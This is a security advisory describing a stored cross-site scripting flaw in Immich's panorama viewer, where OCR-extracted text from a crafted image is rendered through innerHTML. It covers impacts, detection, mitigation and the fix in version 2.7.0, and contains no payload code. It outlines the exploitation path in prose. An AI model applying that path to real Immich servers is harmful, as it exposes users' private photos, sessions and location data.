CVE-2026-35455: Immich Stored XSS Vulnerability

CVE-2026-35455 Overview

CVE-2026-35455 is a Stored Cross-Site Scripting (XSS) vulnerability affecting Immich, a high-performance self-hosted photo and video management solution. The vulnerability exists in the 360° panorama viewer component, where any authenticated user can execute arbitrary JavaScript in the browser of other users who view a malicious panorama with the OCR overlay enabled.

The attack chain involves uploading an equirectangular image containing specially crafted text. When the OCR feature processes this image, it extracts the malicious text, and the panorama viewer subsequently renders it via innerHTML without proper sanitization. This enables a range of dangerous attacks including session hijacking through persistent API key creation, private photo exfiltration, and unauthorized access to GPS location history and face biometric data.

Critical Impact

Authenticated attackers can steal sessions, exfiltrate private photos, and access sensitive biometric and location data from other users by exploiting the unsanitized OCR output in the panorama viewer.

Affected Products

• Immich versions prior to 2.7.0

Discovery Timeline

• 2026-04-08 - CVE CVE-2026-35455 published to NVD
• 2026-04-09 - Last updated in NVD database

Technical Details for CVE-2026-35455

Vulnerability Analysis

This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting. The flaw exists in how the 360° panorama viewer handles text extracted by the OCR feature.

When a user uploads an equirectangular panoramic image, Immich's OCR functionality processes visible text within the image. An attacker can craft an image containing malicious JavaScript payloads embedded as visible text. The OCR engine faithfully extracts this text, which is then passed to the panorama viewer component.

The core issue lies in the panorama viewer's use of innerHTML to render the OCR-extracted content directly into the DOM without any sanitization or encoding. This allows the attacker's JavaScript to execute in the context of any victim user who views the panorama with the OCR overlay enabled.

Root Cause

The root cause is the improper use of innerHTML for rendering OCR-extracted text content without first sanitizing or escaping the input. The application fails to implement output encoding or use safer DOM manipulation methods such as textContent or a sanitization library like DOMPurify before inserting user-controlled content into the page.

Attack Vector

The attack requires local access with low privileges (an authenticated user account). The attacker must first upload a specially crafted equirectangular image containing malicious script content as visible text. When another user views this panorama with OCR overlay enabled, the extracted text containing the malicious payload is rendered unsanitized, triggering script execution in the victim's browser session.

The exploitation enables:

• Session Hijacking: Creating persistent API keys to maintain unauthorized access
• Data Exfiltration: Stealing private photos and videos from the victim's library
• Privacy Compromise: Accessing GPS location history and face biometric data
• Account Takeover: Performing actions as the victim user within the Immich application

The vulnerability requires user interaction as the victim must navigate to view the malicious panorama content with OCR overlay enabled, limiting somewhat the attack's automatability but not reducing its severity given the sensitive nature of the data at risk.

Detection Methods for CVE-2026-35455

Indicators of Compromise

• Unusual API key creation activity, particularly bulk or automated key generation from user sessions
• Uploaded panoramic images containing suspicious text patterns resembling HTML or JavaScript syntax
• Unexpected access patterns to private photo libraries from unfamiliar IP addresses or user agents
• User reports of unexpected behavior when viewing panoramic images with OCR overlay

Detection Strategies

• Implement Content Security Policy (CSP) headers to detect and block inline script execution attempts
• Monitor application logs for errors related to script execution or CSP violations in the panorama viewer component
• Review recently uploaded equirectangular images for embedded text containing HTML tags or JavaScript keywords
• Audit API key creation logs for anomalous patterns indicating potential session hijacking

Monitoring Recommendations

• Enable verbose logging for user session activities including API key management operations
• Deploy web application firewall (WAF) rules to detect XSS patterns in uploaded image metadata and OCR output
• Monitor for unusual data access patterns that may indicate automated exfiltration following XSS exploitation
• Implement real-time alerting on CSP violation reports from client browsers

How to Mitigate CVE-2026-35455

Immediate Actions Required

• Upgrade Immich to version 2.7.0 or later immediately
• Review and revoke any suspicious API keys that may have been created through session hijacking
• Audit user activity logs for signs of unauthorized data access or exfiltration
• Consider temporarily disabling the OCR overlay feature until the patch is applied

Patch Information

The vulnerability is fixed in Immich version 2.7.0. The fix addresses the unsafe use of innerHTML by implementing proper input sanitization for OCR-extracted content before rendering in the panorama viewer. For detailed information about the security fix, refer to the GitHub Security Advisory.

Workarounds

• Disable the OCR feature entirely if upgrading is not immediately possible
• Restrict panorama uploads to trusted administrator accounts only
• Implement strict Content Security Policy headers with script-src 'self' to mitigate XSS execution
• Limit user permissions to prevent untrusted users from uploading panoramic images

For organizations unable to immediately patch, implementing a Content Security Policy that restricts inline script execution can serve as a temporary defense-in-depth measure while the upgrade is scheduled.